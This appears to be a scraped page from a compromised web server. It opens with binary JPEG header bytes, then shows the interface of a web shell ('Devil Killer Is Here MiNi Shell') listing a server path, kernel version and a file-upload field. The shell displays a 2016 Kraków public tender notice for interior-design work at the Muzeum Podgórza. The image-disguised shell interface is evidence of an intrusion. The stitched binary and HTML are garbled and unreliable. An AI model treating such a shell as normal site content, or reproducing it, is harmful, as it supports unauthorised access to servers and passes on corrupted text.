JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20160725/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20160725/153275-N-2016.html

<p class="kh_header"><b>Kraków: Wykonanie dokumentacji projektowej aranżacji wnętrz przestrzeni biurowych, edukacyjnych, recepcyjnych, socjalnych, magazynowych nieruchomości przy ul. Powstańców Wielkopolskich 1 w Krakowie na potrzeby otwarcia Muzeum Podgórza-  docelowo nowego oddziału Muzeum Historycznego Miasta Krakowa, znak postępowania: WI-01-2.271.2.10.2016.</b><br>
<b>Numer ogłoszenia: 153275 - 2016; data zamieszczenia: 25.07.2016</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b>
<!--zamówienia publicznego.</p>-->
<table class="text2">
<tr><td style="border: solid 1px; width:15px black; text-align: center;"><b>V</b></td>
<td>zamówienia publicznego</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>zawarcia umowy ramowej</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>ustanowienia dynamicznego systemu zakupów (DSZ)</td></tr>
</table>


<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Miejska Kraków-Wydział Inwestycji Urzędu Miasta Krakowa , ul. Wielopole 17a, 31-072 Kraków, woj. małopolskie, tel. 12 6168414, faks 12 6168418.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.bip.krakow.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Wykonanie dokumentacji projektowej aranżacji wnętrz przestrzeni biurowych, edukacyjnych, recepcyjnych, socjalnych, magazynowych nieruchomości przy ul. Powstańców Wielkopolskich 1 w Krakowie na potrzeby otwarcia Muzeum Podgórza-  docelowo nowego oddziału Muzeum Historycznego Miasta Krakowa, znak postępowania: WI-01-2.271.2.10.2016..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1.Przedmiotem zamówienia jest wykonanie Opisu przedmiotu zamówienia w rozumieniu ustawy z dnia 29 stycznia 2004 r. Prawo zamówień publicznych (Dz. U. Dz.U. 2015 poz. 2164), tj. dokumentacji projektowej aranżacji wnętrz przestrzeni biurowych, edukacyjnych, recepcyjnych, socjalnych, magazynowych nieruchomości przy ul. Powstańców Wielkopolskich 1 w Krakowie na podstawie której zlecone zostanie wykonanie aranżacji wnętrz w Muzeum Podgórza (docelowo nowego oddziału MHK) w ramach zadania inwestycyjnego Muzeum Podgórza - oddział Muzeum Historycznego Miasta Krakowa - adaptacja nieruchomości przy ul. Powstańców Wielkopolskich 1 w Krakowie w celu utworzenia Muzeum Podgórza - realizowanego przez Muzeum Historyczne Miasta Krakowa wspólnie z Gminą Miejską Kraków.
2.Użyte w niniejszej Specyfikacji Istotnych Warunków Zamówienia zwanej dalej siwz pojęcia oznaczają:
1)Projekt plastyczno - przestrzenny - to dokumentacja składająca się z koncepcji plastyczno - przestrzennej wnętrz, zdefiniowanej w pkt 2) i projektu wykonawczego wnętrz, zdefiniowanego w pkt 3) niniejszego ustępu.
2)Koncepcja plastyczno - przestrzenna wnętrz - to kompletny zestaw zwymiarowanych rysunków dla przestrzeni recepcyjnej (hall) i dla sali wielofunkcyjnej z zapleczem kawiarnianym 1: 25, dla pozostałych pomieszczeń 1: 50 pokazujących topologię całości wnętrz, układ przestrzenny i kolorystykę wszystkich projektowanych pomieszczeń, stanowiąca podstawę do opracowania projektu wykonawczego. 
3)Projekt wykonawczy wnętrz - to kompletny zestaw rysunków - pozwalających na prawidłową realizację aranżacji wnętrz.
4)Specyfikacja techniczna wykonania aranżacji - opracowanie w formie tekstowej, pełniące rolę uzupełniającą  dookreślającą w stosunku do Projektu wykonawczego wnętrz, określające w szczególności wymagania dotyczące właściwości materiałów, zakresu i sposobu wykonania prac oraz oceny prawidłowości wykonania poszczególnych prac. 
5)Kosztorys - dokument kosztowy, którego celem jest szczegółowe ustalenie kosztów danego rodzaju robót, zawierający zbiorcze zestawienie kosztów materiałów i roboczogodzin.
6)	Kosztorys ślepy- dokument pochodny do kosztorysu zawierający zbiorcze zestawienie materiałów i roboczogodzin bez cen.
7)Inwestycja - wykonanie aranżacji wnętrz przestrzeni biurowych, edukacyjnych, recepcyjnych, socjalnych, magazynowych nieruchomości przy ul. Powstańców Wielkopolskich 1 w Krakowie  w ramach zadania inwestycyjnego Muzeum Podgórza - oddział Muzeum Historycznego Miasta Krakowa - adaptacja nieruchomości przy ul. Powstańców Wielkopolskich 1 w Krakowie w celu utworzenia Muzeum Podgórza - realizowanego przez Muzeum Historyczne Miasta Krakowa wspólnie z Gminą Miejską Kraków.
8)Dokumentacja projektowa Opis przedmiotu zamówienia - zbiór opracowań takich jak: Projekt plastyczno - przestrzenny wnętrz, Specyfikacja techniczna wykonania aranżacji, Kosztorysy, opracowane zgodnie z Dyrektywą Parlamentu Europejskiego i Rady 2014/24/UE z dnia 26 lutego 2014 r. w sprawie zamówień publicznych, uchylająca dyrektywę 2004/18/WE, ustawą prawo zamówień publicznych oraz aktami wykonawczymi do tej ustawy, niezbędne do przygotowania i przeprowadzenia postępowania  postępowań o udzielenie zamówienia publicznego w oparciu o tryby przewidziane w ustawie prawo zamówień publicznych na wykonanie aranżacji wnętrz przestrzeni biurowych, edukacyjnych, socjalnych nieruchomości przy ul. Powstańców Wielkopolskich 1 w Krakowie w Muzeum Podgórza (docelowo nowego oddziału MHK), które określać będą zakres prac w ramach umowy, której przedmiotem będzie wykonanie wnętrz nieruchomości przy ul. Powstańców Wielkopolskich 1 w Krakowie z wyłonionym przez Zamawiającego wykonawcą.
3.Dokumentacja projektowa, o której mowa w ust. 1 nin. Rozdziału to zbiór opracowań w tym: 
1)Projekt plastyczno - przestrzenny, na który składa się Koncepcja plastyczno - przestrzenna wnętrz i Projekt wykonawczy wnętrz;
2)Specyfikacje techniczne wykonania aranżacji, 
3)Kosztorysy,
4)Kosztorysy ślepe,
5)Wizualizacje:
a)wszystkie wizualizacje w postaci widoków perspektywicznych, pełno kolorowe, formatu, co najmniej A-3;
b)dla przestrzeni recepcyjnej, co najmniej trzy wizualizacje pokazujące sklepik z kasą, przestrzeń poczekalni oraz szatnię z hallem przed nią - wszystkie z poziomu dorosłego człowieka;
c)dla sali wielofunkcyjnej z zapleczem kawiarnianym, co najmniej dwie wizualizacje pokazujące na jednej kawiarnię w kierunku zaplecza kawiarni i barku, na drugiej salę konferencyjną (w kierunku ściany z zapleczami) - wszystkie z poziomu dorosłego człowieka;
d)dla sali edukacyjnej jedna wizualizacja z poziomu dorosłego człowieka i jedna z poziomu dziecka ukazujące dwa różne widoki;
e)pozostałe pomieszczenia bez wizualizacji, 
(zwaną dalej łącznie również Dokumentacją).
4.Szczegółowy opis przedmiotu zamówienia i zakres przestrzeni (pomieszczeń) oraz rzuty w budynku przy ul. Powstańców Wielkopolskich 1 w Krakowie, określa załącznik nr 1 do niniejszej sizw.
5.Dokumentami uzupełniającymi do Opisu przedmiotu zamówienia są:
1)Projekt wykonawczy dla zadania inwestycyjnego Przebudowa i remont budynku głównego położonego przy ul. Powstańców Wielkopolskich 1 w Krakowie wraz z instalacjami wewnętrznymi: centralnego ogrzewania, elektrycznymi, wodno -kanalizacyjnymi, kanalizacji opadowej, klimatyzacji, p.poż., wraz z dobudową szybu windowego w zakresie branż: architektura, konstrukcja, elektryka, CO, słabe prądy, wentylacja, WOD-KAN opracowany w kwietniu 2015r. przez Autorską Pracownię Projektową Jerzy Wowczak ul. Bieżanowska 46, 30-812 Kraków, zał. nr 1A do nin. siwz, 
2)Projekt wykonawczy dla zadania inwestycyjnego Przebudowa oficyn dla potrzeb wystawienniczych i budowa łącznika z budynkiem głównym wraz z zewnętrzną instalacją: wodociągową, kanalizacji sanitarnej, kanalizacji opadowej, elektrycznej, wentylacji mechanicznej z klimatyzacją, C.W.U., C.O., kotłownią gazową przy ul. Powstańców wielkopolskich 1 w Krakowie w zakresie branż: architektura, konstrukcja, elektryka, CO, słabe prądy, wentylacja, WOD-KAN, gaz, opracowany w kwietniu 2015r. przez Autorską Pracownię Projektową Jerzy Wowczak ul. Bieżanowska 46, 30-812 Kraków - załącznik nr 1B do nin. siwz,
3)Dokumentacja nadzorów autorskich do dokumentacji projektowej w ramach zadania inwestycyjnego Przebudowa i remont budynku głównego położonego przy ul. Powstańców Wielkopolskich 1 w Krakowie wraz z instalacjami wewnętrznymi: centralnego ogrzewania, elektrycznymi, wodno -kanalizacyjnymi, kanalizacji opadowej, klimatyzacji, p.poż., wraz z dobudową szybu windowego oraz Przebudowa oficyn dla potrzeb wystawienniczych i budowa łącznika z budynkiem głównym wraz z zewnętrzną instalacją: wodociągową, kanalizacji sanitarnej, kanalizacji opadowej, elektrycznej, wentylacji mechanicznej z klimatyzacją, C.W.U., C.O., kotłownią gazową przy ul. Powstańców Wielkopolskich 1 w Krakowie w zakresie branż: architektura i instalacje słaboprądowe opracowane przez Autorską Pracownię Projektową Jerzy Wowczak ul. Bieżanowska 46, 30-812 Kraków - załącznik nr 1C do nin. siwz.
Zamawiający będzie na bieżąco przekazywał Wykonawcy, któremu zostanie udzielone zamówienie publiczne dokumentację z nadzorów autorskich nad projektem, o którym mowa w pkt 1) i 2), które odbyły się po zawarciu umowy. 
6.Dokumentacja, o której mowa w ust. 1 nin. Rozdziału zostanie opracowana w dwóch etapach tj.:
w ramach Etapu I Wykonawca wykona:
1)koncepcję plastyczno - przestrzenna wnętrz 
w ramach Etapu II Wykonawca wykona:
1)projekt wykonawczy wnętrz
2)specyfikacje techniczne wykonania aranżacji
3)kosztorysy
4)kosztorysy bez cen tzw. ślepe
5)wizualizacje.
7.Przedmiot zamówienia obejmuje również czynny udział Wykonawcy (minimum jedna osoba reprezentująca Wykonawcę w ramach każdego z postępowań w charakterze członka merytorycznego komisji ds. dokumentacji projektowej) we wszystkich postępowaniach o udzielenie zamówienia publicznego prowadzonych w oparciu o ustawę Prawo zamówień publicznych, w których opisem przedmiotu zamówienia będzie Dokumentacja projektowa, której autorem jest Wykonawca. Wykonawca zobowiązany będzie (odpowiednio dla każdego z zamówień publicznych) do udziału w postępowaniu na etapie jego przygotowania i przeprowadzenie postępowania, a w szczególności do:
1)udziału w spotkaniach komisji przetargowych (spotkania w Urzędzie Miasta Krakowa, Wydział Inwestycji  lub w MHK).
2)przygotowania merytorycznych zapisów wzoru umowy / obowiązków dla wykonawców aranżacji w zakresie wynikającym z realizacji zamówień na podstawie Dokumentacji projektowej. 
3)sporządzenia wyjaśnień (od strony merytorycznej) w zakresie zapytań co do treści Dokumentacji projektowej.
4)doradztwa merytorycznego na etapie badania i oceny ofert. 
5)wsparcia merytorycznego w przygotowaniu informacji, o których mowa w art. 92 i 93 ustawy PZP. 
6)Przygotowywania propozycji  odpowiedzi na odwołania w rozumieniu ustawy Pzp w zakresie związanym z Opisem Przedmiotu Zamówienia (dokumentacją projektową)
8.Niniejsze zadanie jest realizowane w ramach zadania inwestycyjnego Muzeum Podgórza - oddział Muzeum Historycznego Miasta Krakowa - adaptacja nieruchomości przy ul. Powstańców Wielkopolskich 1 w Krakowie na podstawie Uchwały Rady Miasta Krakowa w sprawie Wieloletniej Prognozy Finansowej Miasta Krakowa (załącznik nr 3 cz.B-2, zadanie nr WI/K2.8/15 - cel: rozszerzenie oferty kulturalnej Miasta). Gmina Miejska Kraków - Urząd Miasta Krakowa prowadzi przedmiotową inwestycję w ramach obiektu przy ul. Powstańców Wielkopolskich 1 w Krakowie. Termin wykonania robót budowlanych obejmuje okres od dnia 18.08.2015 r. do dnia 15.08.2017 r.
9. Terminy realizacji zamówienia określone zostały we wzorze umowy, stanowiącym załącznik nr 5 do SIWZ:
etap I wykonanie koncepcji plastyczno - przestrzennej wnętrz: do 30 dni kalendarzowych od dnia zawarcia  umowy;
etap II wykonanie projektu wykonawczego wnętrz specyfikacji technicznych wykonania aranżacji, kosztorysów, kosztorysów ślepych i wizualizacji: do dnia 30.11.2016 r.; 
etap III wykonywanie obowiązków, o których mowa w § 1 ust. 6 umowy w okresie od stycznia do 30 września 2017r..</p>
<p><b>II.1.5)
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>V</b></td>
<td><b>przewiduje się udzielenie zamówień uzupełniających:</b></td></tr>
</table>                            
</b></p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li>
<li>Zamawiający przewiduje możliwość udzielania zamówień uzupełniających, o których mowa w art. 67 ust. 1 pkt 6) ustawy Prawo zamówień publicznych, stanowiących nie więcej niż 50% wartości zamówienia podstawowego i polegających na powtórzeniu tego samego rodzaju zamówień co zamówienie podstawowe, zgodnych z przedmiotem zamówienia podstawowego.</li></ul>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 71.22.00.00-6, 71.22.20.00-0, 79.93.20.00-6, 79.93.40.00-0.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 15.12.2017.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Nie jest wymagane.</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie wyznacza szczegółowego warunku w tym zakresie. Ocena spełnienia tego warunku dokonywana będzie metodą spełnia nie spełnia, w oparciu o informacje zawarte w dokumentach lub oświadczeniach wymienionych w rozdziale 6 siwz.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie wyznacza szczegółowego warunku w tym zakresie. Ocena spełnienia tego warunku dokonywana będzie metodą spełnia nie spełnia, w oparciu o informacje zawarte w dokumentach lub oświadczeniach wymienionych w rozdziale 6 siwz.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie wyznacza szczegółowego warunku w tym zakresie. Ocena spełnienia tego warunku dokonywana będzie metodą spełnia nie spełnia, w oparciu o informacje zawarte w dokumentach lub oświadczeniach wymienionych w rozdziale 6 siwz.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna warunek za spełniony, jeżeli Wykonawca wykaże, iż: dysponuje min. 2 osobami zdolnymi do wykonania umowy, pełniącymi następujące funkcje tj.:
a)Głównym projektantem (min. 1 osoba) - a osoba ta:
1)ukończyła studia drugiego stopnia lub jednolite studia magisterskie w rozumieniu Ustawy z dnia 27 lipca 2005 r. Prawo o szkolnictwie wyższym (Dz. U. z 2012 r., poz. 572 z późn. zm.) na kierunku architektura lub  architektura wnętrz lub wzornictwo lub formy przemysłowe;
2)posiada doświadczenie w ramach którego wykaże, iż posiada min. 2 letnie doświadczenie w projektowaniu wnętrz oraz brała udział w minimum dwóch realizacjach, gdzie poprzez realizację Zamawiający rozumie iż: osoba ta osobiście wykonała projekt lub współprojektowała projekt z zakresu architektury wnętrz o wartości projektu (umowy) min. 20 000 zł brutto (każda z dwóch realizacji) i kubaturze projektowanego  obiektu min. 1 000 m3 obejmującego w swoim zakresie pomieszczenie reprezentacyjne (przez które Zamawiający rozumie pomieszczenie, będące głównym pomieszczeniem przestrzeni obiektu, które pełni funkcje reprezentacyjne, użytkowe i jest połączone funkcjonalnie z innymi pomieszczeniami zaprojektowanymi w ramach tego projektu, np. foyer, hall, recepcję itp.)
W przypadku, gdy wartość wykazywanych realizacji (umów) jest określona w innej walucie niż PLN, dokonane zostanie przeliczenie tej wartości na PLN na podstawie średniego kursu złotego w stosunku do walut obcych określonego w tabeli kursów średnich NBP z dnia publikacji ogłoszenia o zamówieniu.
b)Projektantem wnętrz (min. 1 osoba) a osoba ta:
1)ukończyła studia pierwszego albo drugiego stopnia lub jednolite studia magisterskie w rozumieniu Ustawy z dnia 27 lipca 2005 r. Prawo o szkolnictwie wyższym (Dz. U. z 2012 r., poz. 572 z późn. zm.) na kierunku architektura wnętrz,
2)posiada doświadczenie w ramach którego wykaże, iż brała udział w minimum jednej realizacji, gdzie poprzez realizację Zamawiający rozumie iż: osoba ta osobiście wykonała projekt lub współprojektowała projekt z zakresu architektury wnętrz.
Ocena spełnienia tego warunku dokonywana będzie metodą spełnia nie spełnia, w oparciu o informacje zawarte w dokumentach lub oświadczeniach wymienionych w rozdziale 6 siwz.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie wyznacza szczegółowego warunku w tym zakresie. Ocena spełnienia tego warunku dokonywana będzie metodą spełnia nie spełnia, w oparciu o informacje zawarte w dokumentach lub oświadczeniach wymienionych w rozdziale 6 siwz.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p><ul class="kh_indent_1">
<li>1 - Cena - 70</li>
<li>2 - doświadczenie osób wskazanych przez wykonawcę do realizacji zamówienia - 30</li>
</ul>
<p><b>IV.2.2)</b>
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>&nbsp;</b></td>
    <td><b>przeprowadzona będzie aukcja elektroniczna,</b> adres strony, na której będzie prowadzona: </td></tr>
</table>                            
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1. Wszelkie zmiany umowy wymagają zgody obu Stron wyrażonej w formie pisemnej pod rygorem nieważności. 
2. Zmiany umowy są dopuszczalne w zakresie dozwolonym przez art. 144 ustawy Prawo Zamówień Publicznych.
3. Z zastrzeżeniem formy przewidzianej w pkt 1, Strony dopuszczają możliwość zmiany umowy w stosunku do treści oferty, na podstawie, której dokonano wyboru wykonawcy, w następującym zakresie:
1) zmiany wynagrodzenia, w przypadku, gdy w okresie obowiązywania umowy nastąpi zmiana stawki podatku od towarów i usług i zdarzenie to będzie miało wpływ na wartość wynagrodzenia określonego w § 7 ust. 1 umowy, Strony dokonają zmiany wynagrodzenia przy założeniu, iż wartość netto wynagrodzenia nie ulegnie zmianie;
2) zmiany terminu wykonania umowy, w sytuacji gdyby wystąpiły okoliczności powodujące, że wykonanie umowy nie jest możliwe w terminie, o którym mowa w § 5 ust. 2 umowy, z uwagi na:
a) konieczność wykonania dodatkowych badań i ekspertyz wynikłych w trakcie realizacji prac, których nie można było przewidzieć przed przystąpieniem do prac,
b) siłę wyższą.
3) wystąpienia konieczności zmiany zakresu umowy, z zastrzeżeniem, że zmiana zakresu nie może wykraczać poza określenie przedmiotu umowy zawarte w siwz, ze względu na przedstawienie przez Wykonawcę Zamawiającemu pisemnej propozycji zmian, które w razie ich przyjęcia przyspieszą ukończenie prac lub w inny sposób będą korzystne dla Zamawiającego;
4) wystąpienia konieczności zmiany zakresu przedmiotu umowy w sytuacji zmiany stanu zachowania obiektu w stosunku do stanu zachowania z dnia zawarcia umowy, co zostanie ujawnione w trakcie realizacji umowy, i który to stan odbiega od stanu założonego w opisie przedmiotu zamówienia, a sytuacji tej nie można było przewidzieć w chwili zawarcia umowy.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
